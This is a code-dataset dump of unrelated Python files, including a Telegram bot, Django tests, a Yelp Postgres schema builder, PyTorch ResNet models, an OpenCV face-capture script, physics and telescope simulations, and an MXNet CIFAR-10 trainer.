select\n\t\telse:\n\t\t\tresponse = status\n\n\t\tsocket.sendall(json.dumps(response).encode('UTF-8'))\n\t\tsocket.close()\n","sub_path":"server/DeliverRequest.py","file_name":"DeliverRequest.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"383147444","text":"from BotHandler import BotHandler\r\nimport datetime\r\nimport data as tdata\r\nfrom dict_manager import *\r\n\r\nBOT = BotHandler(tdata.TOKEN) \r\n\r\ndef main(): \r\n new_offset = None\r\n\r\n while True:\r\n prep_message_id = -1\r\n\r\n BOT.get_updates(new_offset)\r\n\r\n last_update = BOT.get_last_update()\r\n if last_update == None:\r\n return\r\n\r\n last_update_id = last_update['update_id']\r\n last_chat_text = last_update['message']['text']\r\n last_chat_id = last_update['message']['chat']['id']\r\n last_chat_name = last_update['message']['chat']['first_name']\r\n last_chat_username = last_update['message']['chat']['username']\r\n\r\n if last_chat_text.startswith(\"/\"):\r\n if last_chat_text == \"/start\":\r\n BOT.send_message(last_chat_id, \"Этот бот поможет тебе выучить языки \\n Он находится в разработке, поэто��у придется подождать\")\r\n elif last_chat_text == \"/help\":\r\n BOT.send_message(last_chat_id, \"\\t Помощь \\n */word* - новое слово\")\r\n\r\n else:\r\n # У нас спрашивают слово\r\n BOT.send_message(last_chat_id, make_string(last_chat_text))\r\n\r\n new_offset = last_update_id + 1\r\n\r\nif __name__ == '__main__':\r\n now = datetime.datetime.now() \r\n print(\"Starting the bot at\", now, \"\\n\")\r\n try:\r\n main()\r\n except Exception as e:\r\n print(\"Got an Exception\")\r\n print(e)\r\n\r\n","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"652795249","text":"import json\n\nfrom django.contrib.gis import geos\nfrom django.urls import reverse\nfrom rest_framework import status\nfrom test_plus.test import TestCase\n\nfrom poznaj.points.tests.factories import PointFactory\nfrom poznaj.stories.filters import WRONG_LAT_LONG_TEXT\nfrom poznaj.stories.models import Story\n\nfrom .factories import StoryFactory\n\n\nclass TestStoriesViewSet(TestCase):\n def setUp(self):\n self.point = PointFactory()\n self.story = StoryFactory.create(points=(self.point,))\n self.list_url = reverse('story-list')\n self.detail_url = reverse('story-detail', kwargs={'pk': self.story.id})\n self.user = self.make_user('user_one')\n self.client.login(username=self.user.username, password='password')\n\n def test_get_all_stories(self):\n response = self.client.get(self.list_url, format='json')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(\n response.json(),\n [{\n 'id': self.story.id,\n 'points': [self.point.id],\n 'title': self.story.title,\n 'first_point': self.story.first_point.id,\n 'description': self.story.description,\n 'duration': '{:02}:00:{:02}'.format(\n self.story.duration.days, self.story.duration.seconds\n )\n }]\n )\n\n def test_create_story(self):\n response = self.client.post(\n self.list_url,\n data={\n 'title': 'my_story',\n 'description': 'example_description',\n 'duration': '00:01:00',\n 'points': [self.point.id],\n }\n )\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertEqual(Story.objects.count(), 2)\n database_story = Story.objects.get(title='my_story')\n self.assertEqual(database_story.description, 'example_description')\n self.assertEqual(str(database_story.duration), '0:01:00')\n\n def test_delete_story(self):\n response = self.client.delete(self.detail_url)\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n self.assertEqual(Story.objects.count(), 0)\n\n def test_update_story(self):\n response = self.client.put(\n self.detail_url,\n data=json.dumps(\n {\n 'title': 'new_title',\n 'description': 'new_description',\n 'duration': '01:00:00',\n 'points': [self.point.id],\n }\n ),\n content_type='application/json'\n )\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(Story.objects.count(), 1)\n database_story = Story.objects.get()\n self.assertEqual(database_story.title, 'new_title')\n self.assertEqual(database_story.description, 'new_description')\n self.assertEqual(str(database_story.duration), '1:00:00')\n\n def test_filter_story(self):\n first_point = PointFactory(geom=geos.fromstr('POINT (9 9)'))\n first_story = StoryFactory.create(first_point=first_point, points=(self.point,))\n list_url_with_filter = '{}?lat=10.00&long=10.00'.format(\n reverse('story-list')\n )\n response = self.client.get(list_url_with_filter, fromat='json')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(\n [first_story.id, self.story.id],\n [story['id'] for story in response.json()]\n )\n\n def test_filter_wrong_arguments(self):\n wrong_filter_url = '{}?lat=not_float&long=the_same'.format(\n reverse('story-list')\n )\n response = self.client.get(wrong_filter_url, fromat='json')\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertEqual(\n response.json(),\n [WRONG_LAT_LONG_TEXT]\n )\n\n def test_get_all_points_for_story(self):\n url = reverse('story-points', kwargs={'pk': self.story.id})\n response = self.client.get(url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(\n response.json(),\n {\n 'features': [\n {\n 'properties': {\n 'images': [],\n 'description': self.point.description,\n 'title': self.point.title\n },\n 'geometry': {\n 'coordinates': [self.point.geom.x, self.point.geom.y], 'type': 'Point'\n },\n 'type': 'Feature'\n }\n ],\n 'type': 'FeatureCollection'\n }\n )\n","sub_path":"poznaj/stories/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":4890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"125349886","text":"from django.urls import path\nfrom . import views\n\nappname = 'blog'\n\nurlpatterns = [\n path('', views.index, name='blog_list'),\n path('detail/<int:id>', views.detail, name='blog_detail'),\n path('create/', views.create, name='blog_create'),\n path('update/<int:id>', views.update, name='blog_update'),\n path('delete/<int:id>', views.delete, name='blog_delete'),\n path('word_list', views.word_list, name='blog_word_list'),\n]","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"589412609","text":"import psycopg2\n\n\"\"\"\nTODO:\n\n1. Add error handling\n2. Add documentation\n\n\"\"\"\nclass YelpDBMaker:\n\n def __init__(self, conn, datafiles):\n self.conn = conn\n self.datafiles = datafiles\n\n def create(self):\n print('Drop existing tables...')\n self._drop_existing_tables()\n if 'business.json' in self.datafiles:\n self._create_business_table()\n if 'checkin.json' in self.datafiles:\n self._create_checkin_table()\n if 'review.json' in self.datafiles:\n self._create_review_table()\n if 'tip.json' in self.datafiles:\n self._create_tip_table()\n if 'user.json' in self.datafiles:\n self._create_user_table()\n\n def _drop_existing_tables(self):\n cur = self.conn.cursor()\n for datafile in self.datafiles:\n if datafile == 'user.json':\n datafile = 'user_info.json'\n try:\n print('Dropping table ' + datafile.split('.')[0].lower() + '...')\n cur.execute('DROP TABLE IF EXISTS ' + datafile.split('.')[0].lower() + ';')\n self.conn.commit()\n except psycopg2.Warning as warn:\n print(warn.pgerror)\n except psycopg2.Error as err:\n print(err.pgerror)\n self.conn.rollback()\n\n def _create_business_table(self):\n cur = self.conn.cursor()\n cur.execute(\"\"\"\n CREATE TABLE business(\n business_id char(22) PRIMARY KEY,\n name text,\n address text,\n city text,\n state text,\n postal_code text,\n lat real,\n long real,\n stars real,\n review_count integer,\n is_open boolean,\n attributes json,\n categories text,\n hours json\n );\n \"\"\")\n self.conn.commit()\n cur.close()\n\n def _create_review_table(self):\n cur = self.conn.cursor()\n cur.execute(\"\"\"\n CREATE TABLE review (\n review_id char(22) PRIMARY KEY,\n user_id char(22),\n business_id char(22),\n stars integer,\n review_date date,\n review_text text,\n useful integer,\n funny integer,\n cool integer\n );\n \"\"\")\n self.conn.commit()\n cur.close()\n\n def _create_user_table(self):\n cur = self.conn.cursor()\n cur.execute(\"\"\"\n CREATE TABLE user_info (\n user_id char(22) PRIMARY KEY,\n name text,\n review_count integer,\n yelping_since date,\n friends text,\n useful integer,\n funny integer,\n cool integer,\n fans integer,\n elite text,\n average_stars real,\n compliment_hot integer,\n compliment_more integer,\n compliment_profile integer,\n compliment_cute integer,\n compliment_list integer,\n compliment_note integer,\n compliment_plain integer,\n compliment_cool integer,\n compliment_funny integer,\n compliment_writer integer,\n compliment_photos integer\n );\n \"\"\")\n self.conn.commit()\n cur.close()\n\n def _create_tip_table(self):\n cur = self.conn.cursor()\n cur.execute(\"\"\"\n CREATE TABLE tip (\n tip_id serial PRIMARY KEY,\n tip_text text,\n tip_date date,\n compliment_count integer,\n business_id char(22),\n user_id char(22)\n );\n \"\"\")\n self.conn.commit()\n cur.close()\n\n def _create_checkin_table(self):\n cur = self.conn.cursor()\n cur.execute(\"\"\"\n CREATE TABLE checkin (\n checkin_id serial PRIMARY KEY,\n business_id char(22),\n dates text\n );\n \"\"\")\n self.conn.commit()\n cur.close()\n\nif __name__ == '__main__':\n pass\n","sub_path":"src/import/create_yelp_db.py","file_name":"create_yelp_db.py","file_ext":"py","file_size_in_byte":4286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"559754445","text":"\"\"\" Network design \"\"\"\nimport torch\nimport torch.nn as nn\n\ndef kronCompact(a,idx=None):\n \"\"\"\n Kronecker product of matrices a and b with leading batch dimensions.\n Batch dimensions are broadcast. The number of them mush\n :type a: torch.Tensor\n :type b: torch.Tensor\n :rtype: torch.Tensor\n \"\"\"\n \n if len(a.shape) > 3:\n siz1 = torch.Size(torch.tensor(a.shape[-2:]) * torch.tensor(a.shape[-2:]))\n res = a.unsqueeze(-1).unsqueeze(-3) * a.unsqueeze(-2).unsqueeze(-4)\n siz0 = res.shape[:-4]\n out = res.reshape(siz0 + siz1)\n else:\n a = a.unsqueeze(dim=1)\n siz1 = torch.Size(torch.tensor(a.shape[-2:]) * torch.tensor(a.shape[-2:]))\n res = a.unsqueeze(-1).unsqueeze(-3) * a.unsqueeze(-2).unsqueeze(-4)\n siz0 = res.shape[:-4]\n out = res.reshape(siz0 + siz1).squeeze(dim=1)\n \n if idx == None:\n out1 = out\n else:\n out1 = out[:,idx]\n return out1\n\n\n## Residual blocks\nclass ResidualBlock(nn.Module):\n def __init__(self, in_features,activation = nn.GELU):\n super(ResidualBlock, self).__init__()\n self.activation = activation\n \n self.block = nn.Sequential(\n nn.Linear(in_features, in_features),\n self.activation(),\n nn.Linear(in_features, in_features),\n )\n \n def forward(self,x):\n # return self.block(x)\n return x + self.block(x)\n \n## ResNet for nonlinear part \nclass nonlinear_part(nn.Module):\n def __init__(self,n,num_residual_blocks,p=2,lb = True, activation = nn.GELU):\n super(nonlinear_part,self).__init__()\n self.activation = activation\n model = [\n nn.Linear(n, n*p),\n # self.activation(),\n # nn.Linear(n*p, n*p),\n ]\n \n for _ in range(num_residual_blocks):\n model += [ResidualBlock(n*p, activation = self.activation)]\n \n model += [\n # nn.Linear(n*p, n*p),\n # self.activation(),\n nn.Linear(n*p, 1,bias = lb),\n ] \n self.model = nn.Sequential(*model)\n \n def forward(self,x):\n return self.model(x)\n \n## Build models using only ResNet\nclass LQResNet(nn.Module):\n def __init__(self, n,num_residual_blocks=4,p=1,nn_bias=True,activation = nn.GELU):\n super(LQResNet,self).__init__()\n self.activation = activation\n \n # self.idx = [i*n+j for i in range(n) for j in range(i,n)]\n self.idx = [i for i in range(n**2)]\n self.nq = len(self.idx)\n \n self.linear = nn.Linear(n,1)\n self.quad = nn.Linear(self.nq,1,bias=False)\n self.nonlinear = nonlinear_part(n,num_residual_blocks,p,activation = self.activation)\n self.linear_out = nn.Linear(3,1)\n \n def forward(self,x):\n xl = self.linear(x)\n xq = self.quad(kronCompact(x))\n xn = self.nonlinear(x)\n xt = torch.cat((xl,xq,xn),dim=1)\n return self.linear_out(xt)\n \nclass model_DL_fully(nn.Module):\n def __init__(self, n,num_residual_blocks=4,p=1,activation = nn.GELU):\n super(model_DL_fully,self).__init__()\n self.activation = activation\n model = [\n nn.Linear(n, n*p),\n self.activation(),\n nn.Linear(n*p, n*p),\n self.activation(),\n nn.Linear(n*p, n*p),\n self.activation(),\n nn.Linear(n*p, n*p),\n self.activation(),\n nn.Linear(n*p, n*p),\n self.activation(),\n nn.Linear(n*p, n*p),\n self.activation(),\n nn.Linear(n*p, 1),\n ]\n self.model = nn.Sequential(*model)\n \n def forward(self,x):\n return self.model(x) \n \n \n","sub_path":"Functions/architecture_design.py","file_name":"architecture_design.py","file_ext":"py","file_size_in_byte":3776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"244605113","text":"import cv2\nimport numpy as np\n\n\n# Init Camera\ncamera = cv2.VideoCapture(0)\n\nface_detector = cv2.CascadeClassifier(\"FaceCascade/templatedata.xml\")\ndataset_path = \"./pics/\"\n\nface_data = []\ncnt = 0\n\nfilename = input(\"Enter name of person \")\nwhile True:\n ret, img = camera.read()\n if ret==False:\n continue\n \n faces = face_detector.detectMultiScale(img,1.3,5)\n if(len(faces)==0):\n continue\n \n face=faces[0]\n x,y,w,h = face\n cv2.rectangle(img,(x,y),(x+w,y+h),(0,200,0),5)\n cropped_img = img[y:y+h,x:x+w,:]\n cropped_img = cv2.resize(cropped_img,(100,100))\n cv2.imshow(\"Image\",img)\n cv2.imshow(\"Cropped Img\",cropped_img)\n cnt += 1\n if cnt%10==0:\n face_data.append(cropped_img)\n print(\"Pics clicked \",len(face_data))\n \n cv2.waitKey(1)\n if cnt==200:\n break\n \nface_data = np.asarray(face_data)\nprint(face_data.shape)\nnp.save(filename+\".npy\",face_data)\n \n \n \n ","sub_path":"DataCollect.py","file_name":"DataCollect.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"151580128","text":"#!/usr/bin/env python\n# vca.py\n#\n# Reads V(q) potential coefficients from file v_of_q.dat,\n# employs the virtual crystal approximation to compute\n# hybrid form factors, writes them to file vca_ff.dat.\n# The potential mixing is controlled by identifiers\n# host_material and doping_level.\n#\n# Georgy Samsonidze, UCB, 2011-02-06\n\nfrom sys import exit\nfrom math import pi, exp, pow\n\ntol = 1.0e-6\nbohr = 0.52917721092\n\nhost_material = 'Si'\ndoping_level = 0.05\n\ndef v_elemental_of_q(q, c):\n return c[0] * (q - c[1]) / (c[2] * exp(c[3] * q) - 1.0)\n\ndef v_binary_of_q(q, c):\n return c[0] * (q - c[1]) / (exp(c[2] * (q + c[3])) + 1.0)\n\ndef v_of_b(b, ca, cb):\n if abs(cb[0]) + abs(cb[1]) + abs(cb[2]) + abs(cb[3]) < tol:\n V3S = v_elemental_of_q(3.0 * b, ca)\n V8S = v_elemental_of_q(8.0 * b, ca)\n V11S = v_elemental_of_q(11.0 * b, ca)\n V3A = 0.0\n V4A = 0.0\n V11A = 0.0\n else:\n V3S = (v_binary_of_q(3.0 * b, ca) + v_binary_of_q(3.0 * b, cb)) / 2.0\n V8S = (v_binary_of_q(8.0 * b, ca) + v_binary_of_q(8.0 * b, cb)) / 2.0\n V11S = (v_binary_of_q(11.0 * b, ca) + v_binary_of_q(11.0 * b, cb)) / 2.0\n V3A = (v_binary_of_q(3.0 * b, ca) - v_binary_of_q(3.0 * b, cb)) / 2.0\n V4A = (v_binary_of_q(4.0 * b, ca) - v_binary_of_q(4.0 * b, cb)) / 2.0\n V11A = (v_binary_of_q(11.0 * b, ca) - v_binary_of_q(11.0 * b, cb)) / 2.0\n return [V3S, V8S, V11S], [V3A, V4A, V11A]\n\ndef mixff(hybrid_material, doping_level, host_a, host_ca, host_cb, dopant_a, dopant_ca, dopant_cb, da, dVS, dVA, hoff):\n #\n hybrid_a = pow((1 - doping_level) * pow(host_a, 3) + doping_level * pow(dopant_a, 3), 1.0/3.0)\n hybrid_b = pow(2.0 * pi * bohr / hybrid_a, 2)\n host_VS, host_VA = v_of_b(hybrid_b, host_ca, host_cb)\n dopant_VS, dopant_VA = v_of_b(hybrid_b, dopant_ca, dopant_cb)\n hybrid_VS = []\n hybrid_VA = []\n for i in xrange(3):\n hybrid_VS.append((1 - doping_level) * host_VS[i] + doping_level * dopant_VS[i])\n hybrid_VA.append((1 - doping_level) * host_VA[i] + doping_level * dopant_VA[i])\n #\n s = '%-9s %6.4f ' % (hybrid_material, hybrid_a)\n s += ' %8.5f %8.5f %8.5f' % (hybrid_VS[0], hybrid_VS[1], hybrid_VS[2])\n s += ' %8.5f %8.5f %8.5f' % (hybrid_VA[0], hybrid_VA[1], hybrid_VA[2])\n s += '\\n'\n hoff.write(s)\n #\n host_b = pow(2.0 * pi * bohr / host_a, 2)\n pure_VS, pure_VA = v_of_b(host_b, host_ca, host_cb)\n da.append(hybrid_a - host_a)\n for i in xrange(3):\n dVS[i].append(hybrid_VS[i] - pure_VS[i])\n dVA[i].append(hybrid_VA[i] - pure_VA[i])\n #\n\nhivq = open('v_of_q.dat', 'r')\nhoff = open('vca_ff.dat', 'w')\n\ns = hivq.readline()\nhoff.write(' a V3S V8S V11S V3A V4A V11A\\n')\n\ni = 0\nhost_index = -1\nmaterial = []\na = []\nca = []\ncb = []\nwhile 1:\n s = hivq.readline()\n if len(s) < 2:\n break\n t = s.split()\n if t[0] == host_material:\n host_index = i\n material.append(t[0])\n a.append(float(t[1]))\n ca.append([])\n ca[i].append(float(t[2]))\n ca[i].append(float(t[3]))\n ca[i].append(float(t[4]))\n ca[i].append(float(t[5]))\n cb.append([])\n cb[i].append(float(t[6]))\n cb[i].append(float(t[7]))\n cb[i].append(float(t[8]))\n cb[i].append(float(t[9]))\n i += 1\nif host_index == -1:\n sys.exit(\"\\n Error: invalid host material\\n\")\n\nda = []\ndVS = [[], [], []]\ndVA = [[], [], []]\nfor dopant_index in xrange(len(material)):\n if dopant_index == host_index:\n continue\n hybrid_material = '%s-%s' % (material[host_index], material[dopant_index])\n mixff(hybrid_material, doping_level, a[host_index], ca[host_index], cb[host_index], a[dopant_index], ca[dopant_index], cb[dopant_index], da, dVS, dVA, hoff)\ns = 'minimum %7.4f ' % min(da)\ns += ' %8.5f %8.5f %8.5f' % (min(dVS[0]), min(dVS[1]), min(dVS[2]))\ns += ' %8.5f %8.5f %8.5f' % (min(dVA[0]), min(dVA[1]), min(dVA[2]))\ns += '\\n'\ns += 'maximum %7.4f ' % max(da)\ns += ' %8.5f %8.5f %8.5f' % (max(dVS[0]), max(dVS[1]), max(dVS[2]))\ns += ' %8.5f %8.5f %8.5f' % (max(dVA[0]), max(dVA[1]), max(dVA[2]))\ns += '\\n\\n'\ns += 'doping level = %.4f, minimum/maximum = deviation from pure material' % doping_level\ns += '\\n'\nhoff.write(s)\n\nhoff.write('\\n')\nhoff.write('a in Angstrom, VG^2S & VG^2A in Rydberg, G^2 in 2*pi/a\\n')\n\nhivq.close()\nhoff.close()\n","sub_path":"MeanField/EPM/vca.py","file_name":"vca.py","file_ext":"py","file_size_in_byte":4175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"391127597","text":"import os\nimport argparse\nimport logging\nlogging.basicConfig(filename='./testlog/convnet_w1_b64_m.log', filemode=\"w\",level=logging.DEBUG)\n#logging.basicConfig(level=logging.DEBUG)\nfrom common import find_mxnet, data, fit\nfrom common.util import download_file\nimport mxnet as mx\n\ndef download_cifar10():\n data_dir=\"data\"\n fnames = (os.path.join(data_dir, \"cifar10_train.rec\"),\n os.path.join(data_dir, \"cifar10_val.rec\"))\n download_file('http://data.mxnet.io/data/cifar10/cifar10_val.rec', fnames[1])\n download_file('http://data.mxnet.io/data/cifar10/cifar10_train.rec', fnames[0])\n return fnames\n#added by mjc-----------------------start-------------------------------------------------\ndef get_convnet(num_classes = 10, force_mirroring=False):\n data = mx.symbol.Variable('data')\n\n conv1 = mx.symbol.Convolution(data=data, num_filter=32, kernel=(5, 5), pad=(2, 2))\n pol1 = mx.symbol.Pooling(data=conv1, kernel=(3, 3), stride=(2, 2), pool_type='max')\n act1 = mx.symbol.Activation(data = pol1, act_type='tanh')\n \n lrn1 = mx.symbol.LRN(data=act1, alpha=5e-05, beta=0.75, knorm=2, nsize=5)\n \n conv2 = mx.symbol.Convolution(data=lrn1, num_filter=32, kernel=(5, 5), pad=(2, 2))\n act2 = mx.symbol.Activation(data = conv2, act_type='tanh')\n pol2 = mx.symbol.Pooling(data=act2, kernel=(2, 2), stride=(2, 2), pool_type='avg')\n \n lrn2 = mx.symbol.LRN(data=pol2, alpha=5e-05, beta=0.75, knorm=2, nsize=5)\n \n conv3 = mx.symbol.Convolution(data=lrn2, num_filter=32, kernel=(5, 5), pad=(2, 2))\n act3 = mx.symbol.Activation(data = conv3, act_type='tanh')\n pol3 = mx.symbol.Pooling(data=act3, kernel=(3, 3), stride=(2, 2), pool_type='avg')\n \n flatten = mx.symbol.Flatten(data=pol3)\n\n fc0 = mx.symbol.FullyConnected(data = flatten, name='fc0', num_hidden=64)\n act3 = mx.symbol.Activation(data = fc0, act_type='tanh')\n\n # conv3 = mx.symbol.Convolution(data=pol2, num_filter=64, kernel=(4, 4))\n # act3 = mx.symbol.Activation(data = conv3, act_type='relu')\n\n fc1 = mx.symbol.FullyConnected(data = act3, name='fc1', num_hidden=64)\n act3 = mx.symbol.Activation(data = fc1, act_type='tanh') \n fc2 = mx.symbol.FullyConnected(data = act3, name='fc2', num_hidden=10) \n resnet = mx.symbol.SoftmaxOutput(data=fc2, name='softmax')\n return resnet \n \n#added by mjc-----------------------end-------------------------------------------------\nif __name__ == '__main__':\n \t# download data\n (train_fname, val_fname) = download_cifar10()\n\n # parse args\n parser = argparse.ArgumentParser(description=\"train cifar10\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n \n fit.add_fit_args(parser)\n data.add_data_args(parser)\n data.add_data_aug_args(parser)\n data.set_data_aug_level(parser, 2)\n \n net = get_convnet(10)\n\n parser.set_defaults(\n # network\n network = 'resnet',\n #num_layers = 110,\n # data\n data_train = train_fname,\n data_val = val_fname,\n num_classes = 10,\n num_examples = 50000,\n image_shape = '3,28,28',\n pad_size = 4,\n # train\n batch_size = 64,\n num_epochs = 300,\n disp_batches = 100,\n lr = .1,\n lr_step_epochs = '200,250',\n )\n \n args = parser.parse_args()\n\n # load network\n net = get_convnet(10)\n # train\n fit.fit(args, net, data.get_rec_iter)","sub_path":"Code_v1/cifar10_Net.py","file_name":"cifar10_Net.py","file_ext":"py","file_size_in_byte":3498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"229592438","text":"from __future__ import division, print_function\nimport os\nimport qubic\nfrom qubicpack.utilities import Qubic_DataDir\nimport healpy as hp\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport sys\n\n\ndef select_det(q, id, multiband=True):\n id = [id]\n if multiband:\n for i in range(q.nsubbands ):\n detector_i = q[i].detector[id]\n q[i].detector = detector_i\n else:\n detector_i = q.detector[id]\n q.detector = detector_i\n return\n\n\nstokes = ['I', 'Q', 'U']\n\nmpl.style.use('classic')\nname = 'test_scan_source'\nresultDir = '%s' % name\nos.makedirs(resultDir, exist_ok=True)\n\nalaImager = True # if True, the beam will be a simple gaussian\ncomponent = 1 # Choose the component number to plot (IQU)\noneComponent = False # True if you want to study only I component, otherwise False if you study IQU\nsel_det = True # True if you want to use one detector, False if you want to use all detectors in focal plane\nid_det = 4 # if sel_det == True, choose detector number\nmultiband = True # True if you want to use a multiband instrument and make TOD with a MultibandAcquisition\n\n# Dictionnary\nglobal_dir = Qubic_DataDir(datafile='instrument.py', datadir=os.environ['QUBIC_DATADIR'])\nprint('global_dir: ', global_dir)\nd = qubic.qubicdict.qubicDict()\nd.read_from_file(global_dir + '/dicts/global_source_oneDet.dict')\n\n# Scene\ns = qubic.QubicScene(d)\n\n# Instrument\nif multiband:\n q = qubic.QubicMultibandInstrument(d)\nelse:\n q = qubic.QubicInstrument(d)\nif sel_det:\n select_det(q, id_det, multiband=multiband)\n\n# Pointing\np = qubic.get_pointing(d)\n\nfix_azimuth = d['fix_azimuth']\nprint('fix_azimuth', fix_azimuth)\n\nplt.figure(figsize=(12, 8))\nplt.subplot(411)\nplt.plot(p.time, p.azimuth, 'bo')\nplt.ylabel('Azimuth')\nplt.subplot(412)\nplt.plot(p.time, p.elevation, 'bo')\nplt.ylabel('Elevation')\nplt.subplot(413)\nplt.plot(p.time, p.pitch, 'bo')\nplt.ylabel('pitch angle')\nplt.subplot(414)\nplt.plot(p.time, p.angle_hwp, 'bo')\nplt.ylabel('HWP angle')\nplt.savefig(resultDir+'/%s_pointing.png'%name, bbox_inches='tight')\n\n# Make a point source\nm0 = np.zeros(12 * d['nside'] ** 2)\nx0 = np.zeros((d['nf_sub'], len(m0), 3))\nid = hp.pixelfunc.ang2pix(d['nside'], fix_azimuth['el'], fix_azimuth['az'],\n lonlat=True)\nsource = m0 * 0\nsource[id] = 1\narcToRad = np.pi / (180 * 60.)\nsource = hp.sphtfunc.smoothing(source, fwhm=30 * arcToRad)\nx0[:, :, component] = source\nhp.mollview(x0[0, :, component])\nplt.show()\n\nif p.fix_az:\n center = (fix_azimuth['az'], fix_azimuth['el'])\nelse:\n center = qubic.equ2gal(d['RA_center'], d['DEC_center'])\n\n# Make TOD\nif multiband:\n Nbfreq_in, nus_edge_in, nus_in, deltas_in, Delta_in, Nbbands_in = qubic.compute_freq(d['filter_nu'] / 1e9,\n d['nf_sub'],\n d['filter_relative_bandwidth'])\n a = qubic.QubicMultibandAcquisition(q, p, s, d, nus_edge_in)\nelse:\n a = qubic.QubicAcquisition(q, p, s, d)\nTOD = a.get_observation(x0, noiseless=True, convolution=False)\n\nplt.plot(TOD[0, :])\nplt.xlabel('pointing index')\nplt.ylabel('TOD')\nplt.show()\n\n# Map making\nif alaImager:\n nf_sub_rec = 1\n d['synthbeam_kmax'] = 0\n if oneComponent:\n d['kind'] = 'I'\n q = qubic.QubicInstrument(d)\n if sel_det:\n select_det(q, id_det, multiband=False)\n arec = qubic.QubicAcquisition(q, p, s, d)\nelse:\n nf_sub_rec = 2\n Nbfreq, nus_edge, nus, deltas, Delta, Nbbands = qubic.compute_freq(d['filter_nu'] / 1e9,\n nf_sub_rec,\n d['filter_relative_bandwidth'])\n\n arec = qubic.QubicMultibandAcquisition(q, p, s, d, nus_edge)\n\nmaps_recon, nit, error = arec.tod2map(TOD, d, cov=None)\nhp.gnomview(maps_recon[:, component], rot=center, reso=15)\nprint(maps_recon.shape)\n\n# Coverage\ncov = arec.get_coverage()\nhp.gnomview(cov, rot=center, reso=15)\ncov = np.sum(cov, axis=0)\nmaxcov = np.max(cov)\nunseen = cov < maxcov * 0.1\n\n# Convolved maps\nTOD_useless, maps_convolved = arec.get_observation(x0)\nmaps_convolved = np.array(maps_convolved)\n\ndiffmap = maps_convolved - maps_recon\nmaps_convolved[:, unseen, :] = hp.UNSEEN\nmaps_recon[:, unseen, :] = hp.UNSEEN\ndiffmap[:, unseen, :] = hp.UNSEEN\n\nxname = ''\nif alaImager == True:\n nf_sub_rec = 1\n xname = 'alaImager'\n\nfor istokes in [0, 1, 2]:\n plt.figure(istokes, figsize=(12, 12))\n xr = 0.1 * np.max(maps_recon[0, :, 0])\n for i in range(nf_sub_rec):\n im_in = hp.gnomview(maps_convolved[i, :, istokes], rot=center, reso=5, sub=(nf_sub_rec, 2, 2 * i + 1), min=-xr,\n max=xr, title='Input ' + stokes[istokes] + ' SubFreq {}'.format(i),\n return_projected_map=True)\n np.savetxt(resultDir + '/in_%s_%s_subfreq_%d_%s.dat' % (name, stokes[istokes], i, xname), im_in)\n im_old = hp.gnomview(maps_recon[i, :, istokes], rot=center, reso=5, sub=(nf_sub_rec, 2, 2 * i + 2), min=-xr,\n max=xr, title='Output ' + stokes[istokes] + ' SubFreq {}'.format(i),\n return_projected_map=True)\n np.savetxt(resultDir + '/out_%s_%s_subfreq_%d_%s.dat' % (name, stokes[istokes], i, xname), im_old)\n\n plt.savefig(resultDir + '/%s_map_%s_%s.png' % (name, stokes[istokes], xname), bbox_inches='tight')\n plt.clf()\n plt.close()\n\nplt.figure(figsize=(15,8))\ncount = 1\n\nif d['kind'] == 'I':\n xr = 0.01 * np.max(maps_recon[:])\n im_old = hp.gnomview(maps_recon[:], rot=center, reso=5, min=-xr, max=xr, title='Output ', return_projected_map=True,\n hold=True, xsize=500)\n plt.show()\nelse:\n for istokes in range(3):\n plt.subplot(1, 3, count)\n xr = 0.009\n im_old = hp.gnomview(maps_recon[0, :, istokes], xsize=500, rot=center, reso=5, min=-xr, max=xr,\n title='Output ' + stokes[istokes], return_projected_map=True, hold=True)\n count += 1\n plt.show()\n\n P = np.sqrt(maps_recon[:, 1] ** 2 + maps_recon[:, 2] ** 2)\n\n plt.figure(figsize=(15, 8))\n\n plt.subplot(1, 2, 1)\n hp.gnomview(P, xsize=500, rot=center, reso=5, title='Output P', return_projected_map=True, hold=True)\n plt.subplot(1, 2, 2)\n hp.gnomview(sb, rot=[0, 90], xsize=500, reso=5, title='Input ', return_projected_map=True, hold=True)\n plt.show()\n","sub_path":"qubic/doc/scanSource.py","file_name":"scanSource.py","file_ext":"py","file_size_in_byte":6569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"88965438","text":"#!/usr/bin/python3\n\nfrom multiprocessing import Pool\nimport time\nimport numpy as np\nimport pandas as pd\n\ndef f(x):\n return x*x\n\nif __name__ == '__main__':\n val = int(1e6)\n \n t1 = time.time()\n with Pool(4) as p:\n p.map(f, range(val))\n t2 = time.time()\n print(t2-t1)\n\n t3 = time.time()\n [ f(el) for el in range(val) ]\n t4 = time.time()\n print(t4-t3)\n\n t5 = time.time()\n x = pd.DataFrame(np.arange(int(1e6)),columns=['x'])\n fx = x.apply(f)\n t6 